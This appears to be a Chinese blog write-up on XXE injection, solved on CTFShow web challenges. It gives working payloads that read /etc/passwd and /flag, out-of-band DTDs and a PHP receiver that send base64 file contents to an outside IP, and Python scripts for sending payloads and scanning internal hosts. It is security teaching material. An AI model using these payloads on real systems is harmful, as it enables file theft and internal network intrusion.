zoukankan      html  css  js  c++  java
  • XML外部实体注入(XXE)漏洞


    img

    0x01:DTD基础知识

    DTD是xml的格式规范,xml的格式由DTD控制

    <?xml version="1.0"?>                           //这一行是 XML 文档定义
    <!DOCTYPE message [
    <!ELEMENT message (receiver ,sender ,header ,msg)>
    <!ELEMENT receiver (#PCDATA)>
    <!ELEMENT sender (#PCDATA)>
    <!ELEMENT header (#PCDATA)>
    <!ELEMENT msg (#PCDATA)>
    
    上面这个 DTD 就定义了 XML 的根元素是 message,然后跟元素下面有一些子元素,那么 XML 到时候必须像下面这么写
    
    <message>
    <receiver>Myself</receiver>
    <sender>Someone</sender>
    <header>TheReminder</header>
    <msg>This is an amazing book</msg>
    </message>
    

    除了能在DTD中定义元素(其实就是那些标签),我们还能在DTD中定义实体(就是标签里面的内容),比如

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe "test" >]>
    
    <creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
    </creds>
    

    &xxe就是对test的引用,要输出的时候&xxe就被test替换了。

    0x02:外部实体

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE note [
    	<!ENTITY content SYSTEM "filename">
    ]>
    
    <c>&content;</c>
    

    引入外部实体的几种方法:

    1. 直接通过DTD外部实体声明

    <?xml verison="1.0"?>
    <!DOCTYPE a[
    	<!ENTITY b SYSTEM "file:///etc/passwd">
    ]>
    <c>&b;</c>
    

    2. 通过DTD文档引入外部DTD文档,DTD文档中写入外部实体声明

    <?xml verison="1.0"?>
    <!DOCTYPE b SYSTEM "http://xxxx.com/a.dtd">
    <c>&b;</c>
    

    a.dtd文件需要放在xxxx.com站的下面,内容为

    <!ENTITY b SYSTEM "file:///etc/passwd">
    

    3. 通过DTD外部实体声明引入外部实体声明

    <?xml verison="1.0"?>
    <!DOCTYPE a[
    	<!ENTITY % d SYSTEM "http://xxxx.com/a.dtd">
    	%d;
    ]>
    <c>&b;</c>
    

    a.dtd文件需要放在xxxx.com站的下面

    <!ENTITY b SYSTEM "file:///etc/passwd">
    

    0x03:xxe能做哪些事

    1、敏感文件读取

    2、探测内网主机和端口

    3、攻击只需http get请求能做的事,比如内网sql注入、内网未授权redis、struct2

    4、通过jar协议进行文件上传

    0x04:XXE有回显

    1. 读取常规文件

    1.1 CTFShow Web入门 web373题

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE payload [  
    <!ELEMENT payload ANY>
    <!ENTITY xxe SYSTEM "file:///flag"> 
    ]>
    <creds><ctfshow>&xxe;</ctfshow></creds>
    

    image-20211228213106583

    2. 读取带特殊字符文件

    如果有回显我们可以读取对方机器上的敏感文件,这个点在上面的DTD中已经体现了,这里要提的是如果读取的文件中有特殊符号,那么无法成功读取,需要配合一些tips,我们可以把我们要读取的数据放在CDATA中输出

    <?xml version="1.0" encoding="utf-8"?> 
    <!DOCTYPE roottag [
    	<!ENTITY % start "<![CDATA[">   
    	<!ENTITY % goodies SYSTEM "file:///flag">  
    	<!ENTITY % end "]]>">  
    	<!ENTITY % dtd SYSTEM "http://ip/evil.dtd"> 
    	%dtd; 
    ]> 
    
    <roottag>&all;</roottag>
    

    evil.dtd的内容如下

    <?xml version="1.0" encoding="UTF-8"?> 
    <!ENTITY all "%start;%goodies;%end;">  // 其实就是 <![CDATA[file:///flag]]>
    

    就像下面这个例子一样,这里ctfshow web入门 web373的题做的演示

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [
    	<!ENTITY % start "<![CDATA[">   
    <!ENTITY % goodies SYSTEM "file:///flag">  
    <!ENTITY % end "]]>">  
    <!ENTITY % dtd SYSTEM "http://106.52.219.217:8888/evil.dtd"> 
    	%dtd;]>
    <creds><ctfshow>&all;
    </ctfshow>
    </creds>
    

    image-20211228223140036

    0x05:XXE无回显

    ​ 使用参数实体,外部引用 DTD

    1. CTFshow Web入门 web374-376题

    方法一

    在服务器上添加如下dtd文件

    # test.dtd
    <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://106.52.219.217:8888/xxe.php?q=%file;'>" >
    %all;
    

    新建用于接受的php

    # xxe.php
    <?php
    highlight_file(__FILE__);
    $xxe = base64_decode($_GET['q']);
    $txt = 'flag.txt';
    file_put_contents($txt,$xxe,FILE_APPEND)
    ?>
    

    burpsuite发包

    <!DOCTYPE ANY [
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY % dtd SYSTEM "http://106.52.219.217:8888/pd.dtd">
    %dtd;
    %send;
    ] >
    <root>test</root>
    

    image-20211228234502870

    方法二

    在服务器是新建test.dtd文件

    <!ENTITY % dtd "<!ENTITY &#x37; xxe  SYSTEM 'http://106.52.219.217:8888/%file;'> ">
    %dtd;
    %xxe;
    

    发送payload

    <!DOCTYPE test [
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY % aaa SYSTEM "http://106.52.219.217:8888/test.dtd">
    %aaa;
    ]>
    <root>123</root>
    

    image-20211228234848395

    2. CTFshow Web入门 web377题

    import requests
    
    url = 'http://ba70d84f-1fd3-4090-851f-0a9478fa9fae.challenge.ctf.show'
    payload = """<!DOCTYPE test [
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY % aaa SYSTEM "http://106.52.219.217:8888/test.dtd">
    %aaa;
    ]>
    <root>123</root>"""
    payload = payload.encode('utf-16')
    print(payload)
    requests.post(url ,data=payload)
    

    image-20211229194950134

    监听拿到flag

    image-20211229195024426

    3. CTFshow Web入门 web378题

    image-20211229195611953

    payload

    <!DOCTYPE abc [
    <!ENTITY xxe SYSTEM "file:///flag">
    ]>
    <user><username>&xxe; </username><password>&xxe;</password></user>
    

    image-20211229195645569

    0x06:xxe探测内网主机和端口

    我们可以尝试读取 /etc/network/interfaces 或者 /proc/net/arp 或者 /etc/host 文件判断内网网段

    # 实际上也就是判断内网主机的80端口是否开启。开启了判断为存活。
    
    import requests
    import base64
    
    def build_xml(string):
        xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""
        xml = xml + "\r\n" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""
        xml = xml + "\r\n" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""
        xml = xml + "\r\n" + """<xml>"""
        xml = xml + "\r\n" + """    <stuff>&xxe;</stuff>"""
        xml = xml + "\r\n" + """</xml>"""
        send_xml(xml)
    '''
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [ 
    	<!ELEMENT foo ANY >
    	<!ENTITY xxe SYSTEM "http://ip:port/" >
    ]>
    
    <xml><stuff>&xxe;</stuff></xml>
    '''
    
    def send_xml(xml,url):
        headers = {'Content-Type': 'application/xml'}
        x = requests.post(url, data=xml, headers=headers, timeout=5).text
        coded_string = x.split(' ')[-2] # a little split to get only the base64 encoded value
        print(coded_string)
    #   print base64.b64decode(coded_string)
    
    if __name__ == '__main__':
        url = input("[*] 输入目标地址,带路由:")
        WD = input("[*] 输入要检测的网段(xx.xx.xx.): ")
        for i in range(1, 255):
            try:
                i = str(i)
                ip = WD + i
                string = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'
                print(string)
                build_xml(string)
            except:
                continue
    

    找到了内网的一台主机,想要知道攻击点在哪,我们还需要进行端口扫描,端口扫描的脚本主机探测几乎没有什么变化,只要把ip 地址固定,然后循环遍历端口就行了,当然一般我们端口是通过响应的时间的长短判断该该端口是否开放的,读者可以自行修改一下,当然除了这种方法,我们还能结合 burpsuite 进行端口探测

    img

    如果内网的服务器有漏洞,并且恰好利用方式在服务器支持的协议的范围内的话,我们就能直接利用 XXE 打击内网服务器甚至能直接 getshell(比如有些 内网的未授权 redis 或者有些通过 http get 请求就能直接getshell 的 比如 strus2)

    0x07:防御xxe

    方法一:禁用外部实体

    方法二:手动黑名单过滤关键词

    0x08:参考链接

    本文大部分参考一下文章:

    https://xz.aliyun.com/t/3357#toc-10

  • 相关阅读:
    Sql Server 日期时间格式转换
    Windows7中pagefil.sys和Hiberfil.sys文件删除与转移
    64位机的pl/sql不安装32位oracle的连接方式
    cmd下进入oracle sqlplus
    杂七杂八
    做题记录Ⅱ
    SPOJ GSS8
    AGC036 A-Triangle | 构造
    Atcoder 题目泛做
    CF398A Cards | 贪心
  • 原文地址:https://www.cnblogs.com/HelloCTF/p/15748335.html
Copyright © 2011-2022 走看看